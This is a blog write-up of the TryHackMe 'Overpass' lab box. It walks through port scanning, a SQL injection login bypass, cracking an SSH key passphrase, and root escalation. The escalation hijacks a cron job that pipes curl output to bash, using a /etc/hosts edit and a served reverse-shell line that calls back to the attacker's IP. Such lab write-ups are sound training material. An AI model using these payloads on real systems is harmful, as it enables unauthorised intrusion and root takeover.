Featured image of post TryHackMe: Overpass Writeup
TryHackMe

TryHackMe: Overpass Writeup

Learn about SQL injections and crontab using shady scripts.

1. Recon

1.1 Port Scanning

❯ nmap -sC -sV -A BOX_IP
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-02 22:56 EST
Stats: 0:00:24 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 49.58% done; ETC: 22:56 (0:00:23 remaining)
Stats: 0:00:41 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 66.33% done; ETC: 22:57 (0:00:20 remaining)
Nmap scan report for BOX_IP
Host is up (0.41s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 37:96:85:98:d1:00:9c:14:63:d9:b0:34:75:b1:f9:57 (RSA)
|   256 53:75:fa:c0:65:da:dd:b1:e8:dd:40:b8:f6:82:39:24 (ECDSA)
|_  256 1c:4a:da:1f:36:54:6d:a6:c6:17:00:27:2e:67:75:9c (ED25519)
80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Overpass
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 91.19 seconds

PS: you can run this with --script=vuln, and that works too. But, it took this amount of time: Nmap done: 1 IP address (1 host up) scanned in 1216.13 seconds. So maybe not a good idea.

1.2 Web Enumeration

❯ gobuster dir -u BOX_IP -w "/usr/share/wordlists/rockyou.txt" -x "html,php,txt"
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://BOX_IP
[+] Threads:        10
[+] Wordlist:       /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     html,php,txt
[+] Timeout:        10s
===============================================================
2021/02/02 23:06:26 Starting gobuster
===============================================================
/index.html (Status: 301)
/img (Status: 301)
/downloads (Status: 301)
/aboutus (Status: 301)
/admin (Status: 301)
/admin.html (Status: 200)
/css (Status: 301)
Progress: 1322 / 220561 (0.60%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2021/02/02 23:12:32 Finished
===============================================================

1.3 SQLI

hmmm. admin look interesting. Using /admin.html gives us a login page.

lets try a basic sql injection: 69 OR 1=1

works!

okay so name of the person is james and … we have the ssh private key printed out lmao.

2. Foothold

lets try:

❯ ssh -i key james@BOX_IP

  • key: the rsa key
  • james: the username
  • BOX_IP: IP address of the box.

password protected ;-; ok so lets take that key and convert it into a better format.

python ssh2john.py id_rsa > id_rsa.hash

time to brute-forcing!

❯ john hash -wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/ciphers [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
*******          (key)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:07 DONE (2021-02-02 23:49) 0.1385g/s 1986Kp/s 1986Kc/s 1986KC/sa6_123..*7¡Vamos!
Session completed

key hidden :)

❯ ssh -i key james@BOX_IP
Enter passphrase for key 'key':

I’m in!

3. PrivEsc

james@overpass-prod:~$ cat todo.txt 
To Do:
> Update Overpass' Encryption, Muirland has been complaining that it's not strong enough
> Write down my password somewhere on a sticky note so that I don't forget it.
  Wait, we make a password manager. Why don't I just use that?
> Test Overpass for macOS, it builds fine but I'm not sure it actually works
> Ask Paradox how he got the automated build script working and where the builds go.
  They're not updating on the website

ok so lets copy linpeas to find any issues:

❯ scp -i path/to/key /path/to/linpeas.sh james@BOX_IP:/destination/path

now,

james@overpass-prod:~$ chmod +x linpeas.sh 
james@overpass-prod:~$ ./linpeas.sh

hmm. so we have /etc/hosts available to edit

james@overpass-prod:~$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 overpass-prod
127.0.1.1 overpass.thm
# The following lines are desirable for IPv6 capable hosts
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

and since there’s some talk about automated build scipts, we should go look at cron.

james@overpass-prod:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
# Update builds from latest code
* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash

ah yeas. look at the last one. it runs every minute, as root. only if we could change the hosting location of overpass.thm … oh wait

so lets edit /etc/hosts’s overpass.thm to our own ip, and setup a python server using:

❯ sudo python3 -m http.server 80
[sudo] password for tanishq: 
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

note the port 80 since that curl is going to look in the default port. Now, wherever you started this server, from this location onwards, we need to have this exact structure /downloads/src/buildscript.sh, so

  • ❯ mkdir downloads
  • ❯ cd downloads
  • ❯ mkdir src
  • ❯ cd src
  • ❯ echo "bash -i >& /dev/tcp/MY_IP/4242 0>&1" > buildscript.sh

this lets us pretend to be a server, serving that buildscript.sh file :)

we are telling the sever to send us a tcp connection to our own ip on the port 4242.

Meanwhile, setup netcat using:

❯ nc -nlvp 4242

  • -l: listen mode, for inbound connects
  • -n: numeric-only IP addresses, no DNS
  • -v: verbose [use twice to be more verbose]
  • -p port: local port number

and we are all in!

© 2020 - 2021 Tanishq Chaudhary
Built with Hugo
Theme Stack designed by Jimmy